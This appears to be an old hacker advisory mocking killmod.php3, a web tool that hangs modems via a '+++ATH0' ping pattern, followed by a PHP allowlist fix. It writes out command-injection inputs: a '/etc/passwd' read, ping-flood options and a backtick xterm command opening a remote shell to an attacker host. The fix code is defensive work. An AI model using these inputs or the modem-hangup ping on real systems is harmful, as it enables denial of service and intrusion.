+-==--==--==--==--==--==--==--==--==--==--==--==--+
| A Few Words Regarding killmod.php3 from Wyzewun |
+--==--==--==--==--==--==--==--==--==--==--==--==-+

I was crawling around Packetstorm about fifteen minutes ago and stumbled upon killmod.php3, a strange and sad creation best described by its creators...

--- snip snip --- snip snip --- snip snip --- snip snip --- snip snip --- snip

killmod.php3 is a php front end that calls a simple shell script (killmod.sh) and allows you to use the +++ath0 bug to hang up older modems.

--------------------------------------------------------------------------------

killmod-0.69.tar.gz contains:
---
README
killmod.php3
killmod.sh
killmod.results
bitch.txt
stupid-bitch.txt
---

HISTORY:

This originally was a project started by me (jigz) because I had created a lame shell script that just would ping with the `+++ATH0' pattern. I was too lazy to type "ping -p 2b2b2b415448300d [target]", so I made the script so I could just "killmod [target]". Then I discovered PHP and made a lame PHP document that called the lame script, so I could do it from a website.

Everything was fine until my friend monkey decided to try and exploit it. I figured it would be very unlikely. But due to the poorly written shell script, submitting the proper hex characters to the form (something like `;cat /etc/passwd') would run and print whatever was after the ";" and effectively pissed me off.

After I discovered his wrongdoing and he discovered I had backdoored him, we signed a full disclosure treaty, which has worked out for the better. We worked together to create this PHP document that effectively weeds out all the nasty characters ( ; | < > & ). Monkey did the PHP coding, and I modified it to look pretty and added a few things.

--- snip snip --- snip snip --- snip snip --- snip snip --- snip snip --- snip

Needless to say, the Hollywood dream story is enough to make you puke. ;-) So let's take a closer look at how this thing works.
The important stuff in the script would be *this* in killmod.php3:

    echo("killing $killmod_address");
    exec("/home/httpd/cgi-bin/killmod.sh $killmod_address > /home/httpd/html/killmod.results");

And *this* in killmod.sh:

    /bin/ping -c 5 -p 2b2b2b415448300d $1

Okay, great, that's simple enough. Note that the user-supplied $killmod_address goes straight into the exec() string, and killmod.sh then passes it on unquoted as $1, so the form input is split into words and options by the shell like any other command line. Now let's think of a few ways to make the lives of those with killmod.php3 on their boxen interesting...

Look at their system variables, eg. make your input "$MACHTYPE" and the output will be something to the effect of...

    ping: cannot resolve i386--freebsd3.4: Host name lookup failure

Make your input string "-a whatever.com" and send in a couple of hundred requests. Things will get a tad noisy over at l33t0 boy's side. ;P

Make your input string "-i 1000000 whatever.com" and carry on sending requests until you figure the host's system resources have been shot to hell.

Make your input `xterm -display your.hostname` to spawn an X-Windoze shell to your box. ;-) In each example I've given so far, the inverted commas were to be ignored - this one is the exception.

Cheers,
Wizdumb [MDMA]

PS. I recommend always stripping these chars: &;`'\/"|*?~<>^()[]{}$\n\r%

w1@mdma.za.net
www.mdma.za.net
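The PS above recommends stripping a list of characters; the README's own filter only strips ; | < > &, which leaves every input shown in this text untouched. As an added example that is not part of the killmod distribution, here is that denylist beside an allowlist validator in PHP (function names are my own, paths are those of the original script), showing which inputs each one lets through to exec().

```php
<?php
// Added example, not from killmod-0.69. Compares the README's denylist
// (strip ; | < > &) with an allowlist that accepts only a hostname or
// dotted-quad IPv4 address, so nothing else ever reaches exec().

// The README's approach: remove a handful of shell metacharacters.
function killmod_denylist(string $input): string
{
    return str_replace([';', '|', '<', '>', '&'], '', $input);
}

// Allowlist: returns the validated host, or null for anything else.
// A leading "-" cannot match, so ping options cannot be smuggled in;
// "$", "`", spaces and quotes cannot match either.
function killmod_allowlist(string $input): ?string
{
    $host = trim($input);
    if ($host === '' || strlen($host) > 253) {
        return null;
    }
    if (filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false) {
        return $host;
    }
    $label = '[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?';
    if (preg_match("/^(?:{$label}\\.)*{$label}$/i", $host) === 1) {
        return $host;
    }
    return null;
}

// The command line a hardened killmod.php3 would hand to exec(). The
// validated host still goes through escapeshellarg() as a second layer;
// killmod.sh must then also quote its argument as "$1" rather than bare $1.
function killmod_command(string $input): ?string
{
    $host = killmod_allowlist($input);
    if ($host === null) {
        return null;
    }
    return '/home/httpd/cgi-bin/killmod.sh ' . escapeshellarg($host)
        . ' > /home/httpd/html/killmod.results';
}

// Constructed inputs, taken from the examples in the text above.
foreach (['whatever.com', '10.0.0.1', '$MACHTYPE', '-i 1000000 whatever.com',
          '`xterm -display your.hostname`'] as $input) {
    printf("%-32s denylist: %-32s allowlist: %s\n", $input,
        killmod_denylist($input), killmod_command($input) ?? 'REJECTED');
}
```

Only the first two inputs survive the allowlist; the denylist returns all five unchanged because none of them contains a character it strips.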